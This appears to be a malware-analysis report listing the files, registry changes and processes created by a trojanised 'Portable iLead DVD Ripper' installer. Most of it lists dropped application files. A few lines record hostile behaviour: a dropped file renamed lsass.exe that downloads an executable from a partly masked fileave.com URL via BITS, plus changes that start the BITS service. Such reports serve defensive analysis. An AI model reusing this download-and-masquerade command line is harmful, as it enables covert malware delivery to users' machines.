Technical Information
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce] 'wextract_cleanup0' = 'rundll32.exe <SYSTEM32>\advpack.dll,DelNodeRunDLL32 "%TEMP%\IXP000.TMP\"'
- [<HKLM>\SYSTEM\ControlSet001\Services\BITS] 'Start' = '00000002'
- %WINDIR%\Temp\skins\ilead dvd ripper\titlebar_right.png
- %WINDIR%\Temp\skins\ilead dvd ripper\titlebar_middle.png
- %WINDIR%\Temp\skins\ilead dvd ripper\titlebar_left.png
- %WINDIR%\Temp\skins\ilead dvd ripper\top.png
- %WINDIR%\Temp\skins\ilead dvd ripper\volume_background.png
- %WINDIR%\Temp\skins\ilead dvd ripper\VCD,DVD.png
- %WINDIR%\Temp\skins\ilead dvd ripper\vback.png
- %WINDIR%\Temp\skins\ilead dvd ripper\titlebar.PNG
- %WINDIR%\Temp\skins\ilead dvd ripper\stopbutton.png
- %WINDIR%\Temp\skins\ilead dvd ripper\Stop3.png
- %WINDIR%\Temp\skins\ilead dvd ripper\skin.xml
- %WINDIR%\Temp\skins\ilead dvd ripper\textbuttonback.png
- %WINDIR%\Temp\skins\ilead dvd ripper\textbuttonbig.png
- %WINDIR%\Temp\skins\ilead dvd ripper\textbuttonbig11.png
- %WINDIR%\Temp\skins\ilead dvd ripper\textbuttonbig1.png
- %WINDIR%\Temp\skins\ilead dvd ripper\volume_backgroundfull.png
- %WINDIR%\Temp\skins\ilead dvd ripper\WindowBackground_BottomRight11.PNG
- %WINDIR%\Temp\skins\ilead dvd ripper\WindowBackground_BottomRight1.PNG
- %WINDIR%\Temp\skins\ilead dvd ripper\WindowBackground_BottomLeft22.png
- %WINDIR%\Temp\skins\ilead dvd ripper\WindowBackground_Top.PNG
- %WINDIR%\Temp\skins\ilead dvd ripper\Zune.png
- %WINDIR%\Temp\skins\ilead dvd ripper\Xbox.png
- %WINDIR%\Temp\skins\ilead dvd ripper\word2.png
- %WINDIR%\Temp\skins\ilead dvd ripper\WindowBackground_BottomLeft11.png
- %WINDIR%\Temp\skins\ilead dvd ripper\vthum1.png
- %WINDIR%\Temp\skins\ilead dvd ripper\volume_slider_over.png
- %WINDIR%\Temp\skins\ilead dvd ripper\volume_slider_normal.png
- %WINDIR%\Temp\skins\ilead dvd ripper\window_main11.png
- %WINDIR%\Temp\skins\ilead dvd ripper\WindowBackground_BottomCenter .png
- %WINDIR%\Temp\skins\ilead dvd ripper\WindowBackground_BottomCenter1.png
- %WINDIR%\Temp\skins\ilead dvd ripper\window_main.png
- %WINDIR%\Temp\skins\ilead dvd ripper\playprocessbackfull.png
- %WINDIR%\Temp\skins\ilead dvd ripper\playprocessback.png
- %WINDIR%\Temp\skins\ilead dvd ripper\playerbarright.png
- %WINDIR%\Temp\skins\ilead dvd ripper\Portable devices.png
- %WINDIR%\Temp\skins\ilead dvd ripper\progress.gif
- %WINDIR%\Temp\skins\ilead dvd ripper\product.png
- %WINDIR%\Temp\skins\ilead dvd ripper\previousbutton.png
- %WINDIR%\Temp\skins\ilead dvd ripper\playerbarleft.png
- %WINDIR%\Temp\skins\ilead dvd ripper\play_slider_normal.png
- %WINDIR%\Temp\skins\ilead dvd ripper\play_backgroundfull.png
- %WINDIR%\Temp\skins\ilead dvd ripper\play_background.png
- %WINDIR%\Temp\skins\ilead dvd ripper\play_slider_over.png
- %WINDIR%\Temp\skins\ilead dvd ripper\playerbarback.png
- %WINDIR%\Temp\skins\ilead dvd ripper\playbutton.png
- %WINDIR%\Temp\skins\ilead dvd ripper\play_slider_pressed.png
- %WINDIR%\Temp\skins\ilead dvd ripper\Property3.png
- %WINDIR%\Temp\skins\ilead dvd ripper\rip_Property.png
- %WINDIR%\Temp\skins\ilead dvd ripper\rip_Delete.png
- %WINDIR%\Temp\skins\ilead dvd ripper\rip_Convert.png
- %WINDIR%\Temp\skins\ilead dvd ripper\scrollbar_bg.png
- %WINDIR%\Temp\skins\ilead dvd ripper\settings.png
- %WINDIR%\Temp\skins\ilead dvd ripper\seperator.png
- %WINDIR%\Temp\skins\ilead dvd ripper\scrollbararrow.png
- %WINDIR%\Temp\skins\ilead dvd ripper\right.png
- %WINDIR%\Temp\skins\ilead dvd ripper\record.png
- %WINDIR%\Temp\skins\ilead dvd ripper\record2.png
- %WINDIR%\Temp\skins\ilead dvd ripper\PSP,PS3.png
- %WINDIR%\Temp\skins\ilead dvd ripper\refresh11.png
- %WINDIR%\Temp\skins\ilead dvd ripper\Restore.png
- %WINDIR%\Temp\skins\ilead dvd ripper\Resent.png
- %WINDIR%\Temp\skins\ilead dvd ripper\refresh.PNG
- %WINDIR%\Temp\skins\ilead dvd ripper\headerspan.png
- %WINDIR%\Temp\skins\ilead dvd ripper\headerend.png
- %WINDIR%\Temp\skins\ilead dvd ripper\hback.png
- %WINDIR%\Temp\skins\ilead dvd ripper\headerstart.png
- %WINDIR%\Temp\skins\ilead dvd ripper\iPhone.png
- %WINDIR%\Temp\skins\ilead dvd ripper\hthum1.png
- %WINDIR%\Temp\skins\ilead dvd ripper\home.PNG
- %WINDIR%\Temp\skins\ilead dvd ripper\FrameActive.png
- %WINDIR%\Temp\skins\ilead dvd ripper\down.png
- %WINDIR%\Temp\skins\ilead dvd ripper\Delete3.png
- %WINDIR%\Temp\skins\ilead dvd ripper\crop.png
- %WINDIR%\Temp\skins\ilead dvd ripper\dvd.png
- %WINDIR%\Temp\skins\ilead dvd ripper\FrameActive1.png
- %WINDIR%\Temp\skins\ilead dvd ripper\forward.PNG
- %WINDIR%\Temp\skins\ilead dvd ripper\editback.PNG
- %WINDIR%\Temp\skins\ilead dvd ripper\iPod.png
- %WINDIR%\Temp\skins\ilead dvd ripper\max.png
- %WINDIR%\Temp\skins\ilead dvd ripper\mainwindow3.png
- %WINDIR%\Temp\skins\ilead dvd ripper\mainwindow2.png
- %WINDIR%\Temp\skins\ilead dvd ripper\menuback.PNG
- %WINDIR%\Temp\skins\ilead dvd ripper\Min.png
- %WINDIR%\Temp\skins\ilead dvd ripper\middle.png
- %WINDIR%\Temp\skins\ilead dvd ripper\menuselect.png
- %WINDIR%\Temp\skins\ilead dvd ripper\mainicon.png
- %WINDIR%\Temp\skins\ilead dvd ripper\list_right.png
- %WINDIR%\Temp\skins\ilead dvd ripper\leftbar.png
- %WINDIR%\Temp\skins\ilead dvd ripper\left.png
- %WINDIR%\Temp\skins\ilead dvd ripper\listprogress.png
- %WINDIR%\Temp\skins\ilead dvd ripper\mainbutton.png
- %WINDIR%\Temp\skins\ilead dvd ripper\loading.gif
- %WINDIR%\Temp\skins\ilead dvd ripper\listprogressfull.png
- %WINDIR%\Temp\skins\ilead dvd ripper\buttom_left1.png
- %WINDIR%\Temp\skins\ilead dvd ripper\bottom.png
- %WINDIR%\Temp\skins\ilead dvd ripper\back.PNG
- %WINDIR%\Temp\skins\ilead dvd ripper\buttom_left11.png
- %WINDIR%\Temp\skins\ilead dvd ripper\buttom_middle11.png
- %WINDIR%\Temp\skins\ilead dvd ripper\buttom_middle1.png
- %WINDIR%\Temp\skins\ilead dvd ripper\buttom_left.png
- %WINDIR%\Temp\skins\ilead dvd ripper\audiobutton.png
- %WINDIR%\Temp\skins\ilead dvd ripper\777.png
- %WINDIR%\Temp\skins\ilead dvd ripper\5-0.gif
- %WINDIR%\Temp\skins\ilead dvd ripper\4-1.gif
- %WINDIR%\Temp\skins\ilead dvd ripper\adback.png
- %WINDIR%\Temp\skins\ilead dvd ripper\Audio.png
- %WINDIR%\Temp\skins\ilead dvd ripper\add.png
- %WINDIR%\Temp\skins\ilead dvd ripper\add3.png
- %WINDIR%\Temp\skins\ilead dvd ripper\buttom_middle.png
- %WINDIR%\Temp\skins\ilead dvd ripper\combobox.png
- %WINDIR%\Temp\skins\ilead dvd ripper\Close.png
- %WINDIR%\Temp\skins\ilead dvd ripper\close1.png
- %WINDIR%\Temp\skins\ilead dvd ripper\controlpanel.PNG
- %WINDIR%\Temp\skins\ilead dvd ripper\copy to ipod.png
- %WINDIR%\Temp\skins\ilead dvd ripper\copy from ipod.png
- %WINDIR%\Temp\skins\ilead dvd ripper\Convert3.png
- %WINDIR%\Temp\skins\ilead dvd ripper\checkradio.png
- %WINDIR%\Temp\skins\ilead dvd ripper\buttom_right.png
- %WINDIR%\Temp\skins\ilead dvd ripper\buttom_right1.png
- %WINDIR%\Temp\skins\ilead dvd ripper\buttom_righ11.png
- %WINDIR%\Temp\skins\ilead dvd ripper\Capacity_Free.png
- %WINDIR%\Temp\skins\ilead dvd ripper\checkbox.png
- %WINDIR%\Temp\skins\ilead dvd ripper\cc.png
- %WINDIR%\Temp\skins\ilead dvd ripper\Capacity_Used.png
- %WINDIR%\Temp\skins\ilead dvd ripper\pause.png
- %WINDIR%\Temp\RarSFX1\language\Spanish.ini
- %WINDIR%\Temp\RarSFX1\language\Russian.ini
- %WINDIR%\Temp\RarSFX1\language\Language.ini
- %WINDIR%\Temp\RarSFX1\profile\3GP - 3GP video(.3gp).pf
- %WINDIR%\Temp\RarSFX1\profile\Apple TV H.264 movie(.mp4).pf
- %WINDIR%\Temp\RarSFX1\profile\Apple TV MPEG-4 Movie(.mp4).pf
- %WINDIR%\Temp\RarSFX1\profile\AAC - AAC Audio (.aac).pf
- %WINDIR%\Temp\RarSFX1\language\Japanese.ini
- %WINDIR%\Temp\RarSFX1\language\Chinese_simplified.ini
- %WINDIR%\Temp\RarSFX1\CodecSet\XviD MPEG-4 Codec.pass2
- %WINDIR%\Temp\RarSFX1\CodecSet\XviD MPEG-4 Codec.pass1
- %WINDIR%\Temp\RarSFX1\language\Dutch.ini
- %WINDIR%\Temp\RarSFX1\language\Hungarian.ini
- %WINDIR%\Temp\RarSFX1\language\French.ini
- %WINDIR%\Temp\RarSFX1\language\English.ini
- %WINDIR%\Temp\RarSFX1\profile\Archos H264 Video - H264 (.mp4).pf
- %WINDIR%\Temp\RarSFX1\profile\General MPEG1 format(.mpg).pf
- %WINDIR%\Temp\RarSFX1\profile\FLV Video (.FLV).pf
- %WINDIR%\Temp\RarSFX1\profile\DVD raw audio(AC3,DTS).pf
- %WINDIR%\Temp\RarSFX1\profile\General MPEG2 format(.mpg).pf
- %WINDIR%\Temp\RarSFX1\profile\HP iPAQ series (.wmv).pf
- %WINDIR%\Temp\RarSFX1\profile\group.ini
- %WINDIR%\Temp\RarSFX1\profile\General Pocket PC video (.wmv).pf
- %WINDIR%\Temp\RarSFX1\profile\DivX Movie - DivX + MP3 + DVD resolution (.avi).pf
- %WINDIR%\Temp\RarSFX1\profile\BlackBerry AMR Audio(.AMR).pf
- %WINDIR%\Temp\RarSFX1\profile\BlackBerry 3GP Video(.3GP).pf
- %WINDIR%\Temp\RarSFX1\profile\Archos Players series (.avi).pf
- %WINDIR%\Temp\RarSFX1\profile\BlackBerry AVI Video(.avi).pf
- %WINDIR%\Temp\RarSFX1\profile\Disney Mix Max player Video - Windows Media Format (.wmv).pf
- %WINDIR%\Temp\RarSFX1\profile\Creative Zen series (.avi).pf
- %WINDIR%\Temp\RarSFX1\profile\BlackBerry MPEG4 Video(.mp4).pf
- <SYSTEM32>\xvid.ax
- <SYSTEM32>\PropList.ocx
- <SYSTEM32>\ac3filter.ax
- <SYSTEM32>\xvidcore.dll
- %WINDIR%\Temp\RarSFX1\updateconfigure.ini
- %WINDIR%\Temp\RarSFX1\T_language.dll
- <SYSTEM32>\xvidvfw.dll
- %WINDIR%\Temp\RarSFX0\ileaddvdripper.exe
- %TEMP%\IXP000.TMP\r.bat
- %TEMP%\IXP000.TMP\w.bat
- %TEMP%\IXP000.TMP\lsass
- %TEMP%\IXP000.TMP\Portable iLead DVD Ripper Platinum 4.0.5.exe
- %WINDIR%\Temp\RarSFX0\sys.exe
- %WINDIR%\Temp\scs2.tmp
- %WINDIR%\Temp\scs1.tmp
- %WINDIR%\Temp\RarSFX1\ileaddvd.dll
- %WINDIR%\Temp\RarSFX1\CodecSet\DivX_ 6.8 Codec (2 Logical CPUs).pass2
- %WINDIR%\Temp\RarSFX1\CodecSet\DivX_ 6.8 Codec (2 Logical CPUs).pass1
- %WINDIR%\Temp\RarSFX1\CodecSet\DivX_ 6.8 Codec (2 Logical CPUs).cfg
- %WINDIR%\Temp\RarSFX1\CodecSet\x264 - H264_AVC encoder.cfg
- %WINDIR%\Temp\RarSFX1\CodecSet\XviD MPEG-4 Codec.cfg
- %WINDIR%\Temp\RarSFX1\CodecSet\x264 - H264_AVC encoder.pass2
- %WINDIR%\Temp\RarSFX1\CodecSet\x264 - H264_AVC encoder.pass1
- %WINDIR%\Temp\RarSFX1\CodecSet\DivX_ 6.8 Codec (1 Logical CPU).pass2
- %WINDIR%\Temp\RarSFX1\version.ini
- %WINDIR%\Temp\RarSFX1\ildvdripper.exe
- %WINDIR%\Temp\RarSFX1\idvdcore.dll
- %WINDIR%\Temp\RarSFX1\register.ini
- %WINDIR%\Temp\RarSFX1\CodecSet\DivX_ 6.8 Codec (1 Logical CPU).pass1
- %WINDIR%\Temp\RarSFX1\CodecSet\DivX_ 6.8 Codec (1 Logical CPU).cfg
- %WINDIR%\Temp\RarSFX1\Settings.ini
- %WINDIR%\Temp\RarSFX1\ileadlicense.txt
- %WINDIR%\Temp\RarSFX1\register.dll
- %WINDIR%\Temp\RarSFX1\link.ini
- %WINDIR%\Temp\RarSFX1\pthreadGC2.dll
- %WINDIR%\Temp\RarSFX1\swscale.dll
- %WINDIR%\Temp\RarSFX1\buynow.url
- %WINDIR%\Temp\RarSFX1\DVDparser.dll
- %WINDIR%\Temp\RarSFX1\getdvdinfo.dll
- %WINDIR%\Temp\RarSFX1\profile\Zune Video - Windows Media Format (.wmv).pf
- %WINDIR%\Temp\RarSFX1\profile\Zune Video - MPEG-4 (.mp4).pf
- %WINDIR%\Temp\RarSFX1\profile\Zune Video - H264 (.mp4).pf
- %WINDIR%\Temp\RarSFX1\skins\ilead dvd ripper.skn
- %WINDIR%\Temp\RarSFX1\id3lib.dll
- %WINDIR%\Temp\RarSFX1\base32Dll.dll
- %WINDIR%\Temp\RarSFX1\nLame.dll
- %WINDIR%\Temp\RarSFX1\avutil.dll
- %WINDIR%\Temp\skins\ilead dvd ripper\option.PNG
- %WINDIR%\Temp\skins\ilead dvd ripper\nextbutton.png
- %WINDIR%\Temp\RarSFX1\avformat.dll
- %WINDIR%\Temp\skins\ilead dvd ripper\Others.png
- %WINDIR%\Temp\skins\ilead dvd ripper\Pane_Y.png
- %WINDIR%\Temp\skins\ilead dvd ripper\Pane_X.png
- %WINDIR%\Temp\skins\ilead dvd ripper\Pane_middle.png
- %WINDIR%\Temp\RarSFX1\avcodec.dll
- %WINDIR%\Temp\RarSFX1\RealEncoderDll.dll
- %WINDIR%\Temp\RarSFX1\profileDll.dll
- %WINDIR%\Temp\RarSFX1\homepage.url
- %WINDIR%\Temp\RarSFX1\WmvCodecDll.dll
- %WINDIR%\Temp\RarSFX1\AviCodecDll.dll
- %WINDIR%\Temp\RarSFX1\XEncoder.dll
- %WINDIR%\Temp\RarSFX1\UnzipSkinDll.dll
- %WINDIR%\Temp\RarSFX1\profile\NTSC-SVCD - MPEG2 (.mpg).pf
- %WINDIR%\Temp\RarSFX1\profile\NTSC DVD - MPEG2 (.mpg).pf
- %WINDIR%\Temp\RarSFX1\profile\MP3 - MPEG Layer-3 Audio (.mp3).pf
- %WINDIR%\Temp\RarSFX1\profile\NTSC-VCD - MPEG1 (.mpg).pf
- %WINDIR%\Temp\RarSFX1\profile\PAL-VCD - MPEG1 (.mpg).pf
- %WINDIR%\Temp\RarSFX1\profile\PAL-SVCD - MPEG2 (.mpg).pf
- %WINDIR%\Temp\RarSFX1\profile\PAL DVD - MPEG2 (.mpg).pf
- %WINDIR%\Temp\RarSFX1\profile\MOV - Apple QuickTime(.mov).pf
- %WINDIR%\Temp\RarSFX1\profile\iPod Classic MPEG-4 Movie (.mp4).pf
- %WINDIR%\Temp\RarSFX1\profile\iPhone (480x320) MPEG-4 Movie(.mp4).pf
- %WINDIR%\Temp\RarSFX1\profile\iPhone (480x320) H.264 Movie(.mp4).pf
- %WINDIR%\Temp\RarSFX1\profile\iPod Classic H.264(AVC) Movie (.mp4).pf
- %WINDIR%\Temp\RarSFX1\profile\M4A - M4A Audio (.m4a).pf
- %WINDIR%\Temp\RarSFX1\profile\iPod Video nano movie(.mp4).pf
- %WINDIR%\Temp\RarSFX1\profile\iPod Touch movie(.mp4).pf
- %WINDIR%\Temp\RarSFX1\profile\PS3 Video - H264 (.mp4).pf
- %WINDIR%\Temp\RarSFX1\profile\WMA - Windows Media Audio (.wma).pf
- %WINDIR%\Temp\RarSFX1\profile\Wii MJPEG Video (.avi).pf
- %WINDIR%\Temp\RarSFX1\profile\Wii FLV Video (.FLV).pf
- %WINDIR%\Temp\RarSFX1\profile\WMVTemplate.prx
- %WINDIR%\Temp\RarSFX1\profile\Xbox360 Video - Windows Media Format (.wmv).pf
- %WINDIR%\Temp\RarSFX1\profile\Xbox360 Video - MPEG2 (.mpg).pf
- %WINDIR%\Temp\RarSFX1\profile\Xbox360 Video - H264 (.mp4).pf
- %WINDIR%\Temp\RarSFX1\profile\Wide Screen Zen Vision W(.avi).pf
- %WINDIR%\Temp\RarSFX1\profile\PSP - PSP MPEG-4 Movie (.mp4).pf
- %WINDIR%\Temp\RarSFX1\profile\PSP - PSP AVC Movie (.mp4).pf
- %WINDIR%\Temp\RarSFX1\profile\PS3 Video - MPEG2 (.mpg).pf
- %WINDIR%\Temp\RarSFX1\profile\Real Media format - (.rm,rmvb).pf
- %WINDIR%\Temp\RarSFX1\profile\WAV - WAV format (.wav).pf
- %WINDIR%\Temp\RarSFX1\profile\VFW codec (Divx,Xvid etc) - (.avi).pf
- %WINDIR%\Temp\RarSFX1\profile\temp.prx
- %WINDIR%\Temp\scs2.tmp
- %WINDIR%\Temp\scs1.tmp
- from %TEMP%\IXP000.TMP\lsass to %TEMP%\IXP000.TMP\lsass.exe
- ClassName: 'EDIT' WindowName: ''
- ClassName: 'ConsoleWindowClass' WindowName: 'ntvdm-b60.b64.380001'
- '%WINDIR%\Temp\RarSFX1\ildvdripper.exe'
- '%TEMP%\IXP000.TMP\lsass.exe' /transfer jman /download /priority high http://bi####r.fileave.com/IC/zhvntnlgecngmdn.exe "C:\Iexplor701.exe"
- '%WINDIR%\Temp\RarSFX0\ileaddvdripper.exe'
- '%TEMP%\IXP000.TMP\Portable iLead DVD Ripper Platinum 4.0.5.exe'
- '%WINDIR%\Temp\RarSFX0\sys.exe'
- '<SYSTEM32>\net.exe' start bits
- '<SYSTEM32>\net1.exe' start bits
- '<SYSTEM32>\ntvdm.exe' -f -i1
- '<SYSTEM32>\cmd.exe' /C r.bat